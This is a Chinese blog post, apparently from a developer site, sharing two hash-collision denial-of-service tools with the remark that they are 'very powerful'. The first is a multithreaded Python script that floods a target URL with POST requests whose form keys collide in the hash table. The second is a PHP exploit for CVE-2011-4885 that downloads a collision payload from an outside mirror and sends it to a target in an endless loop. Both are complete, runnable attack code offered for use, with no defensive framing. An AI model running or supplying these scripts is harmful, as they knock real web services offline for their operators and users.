多语言 hash web dos 代码

不多说。威力巨大。

import threading,argparse,sys,socket,re
import urllib.parse as up

parser = argparse.ArgumentParser(description='Http range Dos tools,by Yatere.')

parser.add_argument('-t',help="Trager's url")
parser.add_argument('-r',default=256,type=int,help="Trager's Threading Number")

args = parser.parse_args()
if args.t ==None:
          parser.print_help()
          sys.exit(1)
          
host=up.urlsplit(args.t).netloc
file=up.urlsplit(args.t).path+up.urlsplit(args.t).query
threadno=args.r
port=80


a=0
txt=''
for i in range(1,32768):
	a=a+32768
	txt=txt+'&array['+str(a)+"]=0"

had='POST /'+file+' HTTP/1.1\r\nHost: '+host+'\r\nAccept: */*\r\nContent-Length: 621444\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n'+txt


class yk(threading.Thread):
          def __init__(self,domain,port=80):
                    super(yk,self).__init__()
                    self.domain=domain
                    self.port=port
                    self.start()

          def run(self):
                    while True:
                              try:  
                                        a=socket.socket()
                                        a.connect((self.domain,self.port))
                                        a.send(had.encode())
                                        a.close()
                                        print('HEADing\n')
                              except Exception as a:
                                        print (a)
                                        pass
                    


                                        
for i in range(threadno):
          yk(host,port)

windows 版本扫后上传


国外另外一个

<?php
/*
PHP 5.3.* Hash Colission DoS Exploit by infodox
Original version by itz me (opensc.ws)
CVE-2011-4885

Mirrors List:

http://compsoc.nuigalway.ie/~infodox/hashcollide.txt

http://jrs-s.net/hashcollide.txt

http://www.infodox.co.cc/Downloads/hashcollide.txt

Changes:
Different mirror for hashcollide.txt
Now takes target as a command line argument
Status message printing

Twitter: @info_dox
Blog: blog.infodox.co.cc
Site: http://www.infodox.co.cc/
*/
$targ = $argv[1];
$x = file_get_contents("http://jrs-s.net/hashcollide.txt"); // if this doesnt work replace with the mirrors_lst ones...
while(1) {
 echo "firing";
 $ch = curl_init("$targ");
 curl_setopt($ch, CURLOPT_POSTFIELDS, $x);
 curl_exec($ch);
 curl_close($ch);
 echo "[+] Voly Sent!";
}
?>


  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值